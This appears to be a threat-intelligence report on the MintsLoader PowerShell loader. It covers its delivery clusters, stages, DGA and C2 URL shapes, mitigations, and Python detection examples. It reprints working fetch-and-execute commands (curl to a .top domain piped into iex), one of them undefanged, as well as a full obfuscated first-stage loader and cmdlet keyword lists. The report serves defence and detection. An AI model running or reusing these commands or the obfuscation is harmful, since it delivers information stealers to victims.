MintsLoader

MintsLoader is a multi-staged, obfuscated PowerShell loader that uses JavaScript to drop a variety of payloads.

Overall rank: #9

Customers affected: 2%


Analysis

MintsLoader is a PowerShell-based malware loader that uses JavaScript and PowerShell to download and execute additional payloads, including StealC, Vidar, and AsyncRAT. The threat is characterized by a URL containing 1.php?s=, where the value after the equal sign is a campaign identifier.

Initial access clusters

Red Canary observed at least three distinct clusters of activity delivering MintsLoader in 2025.

Paste and run with KongTuke

By far the most frequent is a cluster of paste-and-run activity associated with KongTuke. In this cluster, users are urged to copy the MintsLoader first-stage PowerShell command directly into the Windows run dialog. For example:

powershell -WindowStyle Hidden $global:block=curl -useb hxxp[://]lalclenfjhkinbn[.]top/1.php?s=527;iex $global:block.content

In Windows PowerShell, curl is an alias for Invoke-WebRequest and -useb abbreviates -UseBasicParsing, so the command downloads the MintsLoader second stage, stores the response in $global:block, and passes its body (.content) to Invoke-Expression (iex), which runs it in memory and continues the execution chain.

SocGholish

Another cluster of activity includes SocGholish, this year’s 8th most prevalent threat, delivering MintsLoader. This cluster begins with initial execution of the SocGholish fake update JavaScript and, within seconds, execution of an obfuscated version of the first-stage MintsLoader PowerShell command. Once deobfuscated, the script uses curl to download the next stage from a DGA-generated .top domain.

JavaScript lures

We also observed another initial access cluster that, like SocGholish, relied on malicious JavaScript lures. In some instances, this cluster used language-specific lures like Fattura (Italian for “invoice”), followed by eight digits, for example: Fattura26940207.js.

In other instances, lures followed in the footsteps of 2024 SocGholish and Scarlet Goldfinch behavior, using the name update.js. The JavaScript contents frequently contained large amounts of filler text, often excerpted from the same book, to obscure the code that calls the MintsLoader first stage.

MintsLoader is frequently delivered from paste-and-run activity associated with KongTuke.

MintsLoader typically operates in three stages.

Ransomware intrusion chain

Initial download

The first stage of the malware is a PowerShell script that uses curl to retrieve the second stage of the malware and execute it:

"PowerShell.exe" -WindowStyle Hidden $global:block=curl -useb http://bfhdkgmmhdbikgj.top/1.php?s=527;iex $global:block.content

In some cases, this first-stage command is obfuscated, often by storing the URL as an array of integers, each the decimal code of a character plus (or minus) a hardcoded key, which the script reverses at run time:

$mtfgncslzoh='ur' ;set-alias mitresa c$($mtfgncslzoh)l;$eyfgdrxtonz=(8199,8211,8211,8207,8153,8142,8142,8196,8214,8198,8198,8213,8199,8213,8144,8144,8145,8141,8211,8206,8207,8142,8144,8141,8207,8199,8207,8158,8210,8156,8149,8146,8196,8152,8148,8193,8196,8144,8140,8152,8145,8196,8143,8140,8147,8148,8194,8144,8140,8192,8152,8145,8151,8140,8149,8148,8195,8149,8146,8193,8144,8150,8194,8195,8144,8194);$ytcwmx=('reicporet','get-cmdlet');$vadjfpzeqrhnk=$eyfgdrxtonz;foreach($pgervkjxd in $vadjfpzeqrhnk){$ropevbfjanlm=$pgervkjxd;$tbcevxwszugj=$tbcevxwszugj+[char]($ropevbfjanlm-8095);$zipcdfqtvrgk=$tbcevxwszugj; $uqcklneydp=$zipcdfqtvrgk};$bythnpjxazqs[2]=$uqcklneydp;$aikslvnymdehcw='rl';$mgwjrapx=1;.$([char](((200 + 30) - (100 + 25)))+'e'+'x')(mitresa -useb $uqcklneydp)

This PowerShell script sets an alias (mitresa) for curl, then runs a foreach loop that subtracts the hardcoded key 8095 from each integer and appends the resulting character to rebuild the target URL, in this case hxxp[://]ewggvhv112[.]top/1.php?s=63e95be1-92e0-45c1-a928-65d63b17cd1c. The cmdlet name iex is likewise assembled at run time from a computed character ((200 + 30) - (100 + 25) = 105, which is i) plus the literal 'e' and 'x'.

The aliased curl command is then executed with the -useb parameter against the deobfuscated URL, and its output is passed to iex.

System information discovery

The payload retrieved by curl is the second stage of MintsLoader. It is another obfuscated PowerShell script, executed in memory by the first-stage PowerShell process, that attempts an AMSI bypass and conducts system reconnaissance to determine what type of machine it is on. The script checks whether the system is a virtual machine, checks the video controller, and checks what kind of cache memory is present. Depending on the result of each check, the script appends a value to a key variable, building a fingerprint of the host. This key value is later passed as a parameter in the URI, along with the computer name and the campaign identifier, when the script reaches out to command and control:

hxxp://<dga_domain>.top/<randomly_generated_value>.php?id=$env:computername&key=<generated_key_value>&s=63e95be1-92e0-45c1-a928-65d63b17cd1c

The domain generation algorithm in the second stage seeds a pseudorandom number generator with the day of the year plus additional constants and produces a 15-character domain under the .top TLD. The majority of the observed infrastructure is hosted on BLNWX (AS399628), a known virtual private server reseller.
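As an added example (not from the report), the following Python classifier matches the two MintsLoader URL shapes described in this section, the first-stage 1.php?s= download and the second-stage <name>.php?id=&key=&s= beacon, and runs them over constructed proxy log lines. The 15-letter .top check is only a hint that a host resembles the DGA output, since the first-stage hosts quoted above are not all 15 characters; the C2 host, computer name, and key value in the sample log are placeholders, the log format is assumed, and the DGA itself is not reproduced. The campaign pivot relies on the report's observation that the s= value carries over from the first stage to the C2 request.

```python
from urllib.parse import parse_qs, urlparse


def classify_mintsloader_url(url):
    """Classify one URL as 'stage1' (<host>.top/1.php?s=<campaign>), 'c2'
    (<host>.top/<name>.php?id=&key=&s=), or None. Returns a dict on a hit."""
    parsed = urlparse(url)
    host = (parsed.hostname or "").lower()
    path = parsed.path.lower()
    params = parse_qs(parsed.query)
    if not host.endswith(".top") or not path.endswith(".php"):
        return None
    if set(params) >= {"id", "key", "s"}:
        stage = "c2"            # more specific shape first: a beacon also has an s= value
    elif path.endswith("/1.php") and "s" in params:
        stage = "stage1"
    else:
        return None
    label = host.rsplit(".", 1)[0]
    return {
        "stage": stage,
        "host": host,
        "campaign_id": params["s"][0],
        # The second-stage DGA yields 15-character .top domains; first-stage hosts vary,
        # so this is a hint for triage, not a requirement.
        "dga_shaped": len(label) == 15 and label.isalpha(),
    }


# Constructed proxy log lines (timestamp, source IP, URL). Hosts other than the two
# first-stage domains quoted in this section are placeholders, not observed infrastructure.
PROXY_LOG = """\
2025-03-04T10:15:01Z 10.1.2.3 http://lalclenfjhkinbn.top/1.php?s=527
2025-03-04T10:15:04Z 10.1.2.3 http://abcdefghijklmno.top/q7f3.php?id=WS-0412&key=1011100&s=527
2025-03-04T10:15:09Z 10.1.2.3 https://www.example.com/index.php?id=1&key=2&s=3
2025-03-04T10:16:00Z 10.1.2.4 http://ewggvhv112.top/
2025-03-04T10:16:30Z 10.1.2.4 http://ewggvhv112.top/1.php?s=63e95be1-92e0-45c1-a928-65d63b17cd1c
"""


def scan_proxy_log(log=PROXY_LOG):
    """Return one hit record per matching log line, carrying time and source address."""
    hits = []
    for line in log.splitlines():
        timestamp, src, url = line.split(maxsplit=2)
        result = classify_mintsloader_url(url)
        if result:
            hits.append({"time": timestamp, "src": src, **result})
    return hits


def hosts_by_campaign(hits):
    """Pivot: the s= value persists from first stage to C2, so it links hosts per campaign."""
    grouped = {}
    for hit in hits:
        grouped.setdefault(hit["campaign_id"], set()).add(hit["host"])
    return {campaign: sorted(hosts) for campaign, hosts in grouped.items()}


if __name__ == "__main__":
    found = scan_proxy_log()
    for hit in found:
        print(hit)
    print(hosts_by_campaign(found))
```

In the sample the example.com line is dropped on the TLD check even though it has id, key, and s parameters, and the bare ewggvhv112.top root request is dropped because there is no .php path, which keeps the rule from firing on ordinary web traffic to .top domains.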

Payload execution

The final stage is also a PowerShell script with obfuscation similar to the second stage. Once deobfuscated, it attempts another AMSI bypass, then retrieves and executes the final payload. The payloads deployed are typically information stealers such as StealC and Vidar (AsyncRAT has also been observed), aimed at gathering further information from the victim.

Take action

Much like with SocGholish, the JavaScript initial access clusters associated with MintsLoader can be mitigated by using a group policy object (GPO) to change the default handler for .js files in Windows from the Windows Script Host (wscript.exe) to Notepad or another editor, so that a double-clicked lure opens as text instead of executing.

A similar GPO-based mitigation applies to paste and run: disabling Windows key hotkeys for users (the Turn off Windows Key hotkeys policy) blocks the Win+R shortcut the lures rely on to open the Run dialog. However, since Windows hotkeys are a popular feature, user education may be a more frictionless alternative.

Detection opportunities

PowerShell executing invoke-expression and invoke-restmethod

The following pseudo-detection analytic identifies instances of PowerShell using invoke-expression together with invoke-restmethod to download content from a remote URL or IP address. Adversaries use this combination to download and execute remotely hosted scripts, as seen in many paste-and-run commands. Note that some utilities like Chocolatey or Chef use these cmdlets legitimately. Note also that the MintsLoader first-stage commands above download with curl, which in Windows PowerShell is an alias for Invoke-WebRequest rather than Invoke-RestMethod (as are iwr and wget); a production version of this logic should include those download cmdlets as well, or it will not fire on the KongTuke command.

process == ('powershell')
&&
deobfuscated_command_includes ('irm' || 'invoke-restmethod')
&&
deobfuscated_command_includes ('iex' || 'invoke-expression')
&&
deobfuscated_command_includes ('https?' || IP address)
&&
deobfuscated_command_excludes (approved URL || approved IP address)
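The following Python implementation of the pseudo-analytic is an added example, not Red Canary's detection code. It runs over a handful of constructed process events, treats the command line as already deobfuscated (the deobfuscated_command field is assumed), and broadens the download clause to curl, wget, iwr and Invoke-WebRequest so that it fires on the curl-based MintsLoader first stage. The allowlist, process-name list, and event format are assumptions; the allowlisted Chocolatey URL is the one Chocolatey's own install instructions use.

```python
import ipaddress
import re
from urllib.parse import urlparse

# Download cmdlets: the pseudo-analytic lists irm/Invoke-RestMethod; curl, wget, iwr and
# Invoke-WebRequest are added here (an extension) because MintsLoader uses the curl alias.
DOWNLOAD_CMDLETS = ("irm", "invoke-restmethod", "iwr", "invoke-webrequest", "curl", "wget")
EXEC_CMDLETS = ("iex", "invoke-expression")
POWERSHELL_NAMES = {"powershell", "powershell.exe", "pwsh", "pwsh.exe"}
# Hypothetical allowlist standing in for 'approved URL || approved IP address' (lowercase).
APPROVED_URLS = {"https://community.chocolatey.org/install.ps1"}
APPROVED_IPS = {"10.0.0.5"}

URL_RE = re.compile(r"https?://[^\s'\";)|]+")
IPV4_RE = re.compile(r"(?<![\d.])\d{1,3}(?:\.\d{1,3}){3}(?![\d.])")


def _has_keyword(cmd, keywords):
    """True if any keyword occurs as a whole token, so 'curl' does not match 'curly'."""
    return any(re.search(r"(?<![\w-])" + re.escape(k) + r"(?![\w-])", cmd) for k in keywords)


def _remote_refs(cmd):
    """Collect URLs and syntactically valid IPv4 addresses referenced by the command."""
    refs = URL_RE.findall(cmd)
    for cand in IPV4_RE.findall(cmd):
        try:
            refs.append(str(ipaddress.ip_address(cand)))
        except ValueError:
            pass  # e.g. 999.1.1.1 is not an address
    return refs


def _is_approved(ref):
    """A reference is approved if it is an allowlisted URL, an allowlisted IP, or a URL
    whose host is an allowlisted IP."""
    host = urlparse(ref).hostname or ""
    return ref in APPROVED_IPS or host in APPROVED_IPS or ref.rstrip("/") in APPROVED_URLS


def matches_paste_and_run(event):
    """Apply the pseudo-analytic to one event: PowerShell process, a download cmdlet and
    iex in the deobfuscated command line, and at least one remote reference that is not
    on the allowlist (the 'excludes' clause). No remote reference means no match."""
    if event["process"].lower() not in POWERSHELL_NAMES:
        return False
    cmd = event["deobfuscated_command"].lower()
    if not (_has_keyword(cmd, DOWNLOAD_CMDLETS) and _has_keyword(cmd, EXEC_CMDLETS)):
        return False
    return any(not _is_approved(ref) for ref in _remote_refs(cmd))


# Constructed sample events (not from the report's telemetry). Event 1 is the KongTuke
# command quoted above with defanging removed; 203.0.113.10 is a documentation address.
SAMPLE_EVENTS = [
    {"id": 1, "process": "powershell.exe",
     "deobfuscated_command": "powershell -WindowStyle Hidden $global:block=curl -useb "
                             "http://lalclenfjhkinbn.top/1.php?s=527;iex $global:block.content"},
    {"id": 2, "process": "powershell.exe",
     "deobfuscated_command": "irm https://community.chocolatey.org/install.ps1 | iex"},
    {"id": 3, "process": "pwsh.exe",
     "deobfuscated_command": "Invoke-Expression (Invoke-RestMethod http://203.0.113.10/a.ps1)"},
    {"id": 4, "process": "cmd.exe",
     "deobfuscated_command": "cmd /c powershell irm http://203.0.113.10/a.ps1 | iex"},
    {"id": 5, "process": "powershell.exe",
     "deobfuscated_command": "Get-Process | Where-Object { $_.CPU -gt 100 }"},
]


def flagged_event_ids(events=SAMPLE_EVENTS):
    """Return the ids of events the analytic would alert on."""
    return [e["id"] for e in events if matches_paste_and_run(e)]


if __name__ == "__main__":
    print(flagged_event_ids())
```

Event 4 is not flagged because the analytic keys on the PowerShell process itself; in that case the child powershell.exe event, not the cmd.exe parent, is the one that matches. Event 2 shows the allowlist doing its job on a legitimate installer, which is why the exclusion must be by exact URL rather than by cmdlet.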
